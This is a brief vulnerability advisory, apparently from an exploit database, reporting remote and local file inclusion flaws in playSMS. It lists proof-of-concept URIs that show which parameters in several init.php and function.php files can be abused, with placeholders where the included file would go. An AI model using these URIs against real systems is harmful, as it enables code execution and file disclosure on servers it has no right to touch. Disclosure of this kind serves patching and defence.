|
playSMS Multiple Remote And Local File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/path/plugin/gateway/gnokii/init.php?apps_path[plug]=[Rfi] http://www.example.com/path/plugin/gateway/gnokii/init.php?gateway_module=[Lfi] http://www.example.com/path/plugin/themes/default/init.php?apps_path[themes]=[Rfi]? http://www.example.com/path/plugin/themes/default/init.php?themes_module=[Lfi] http://www.example.com/path/lib/function.php?apps_path[libs]=[Rfi] |
|
 Privacy Statement |
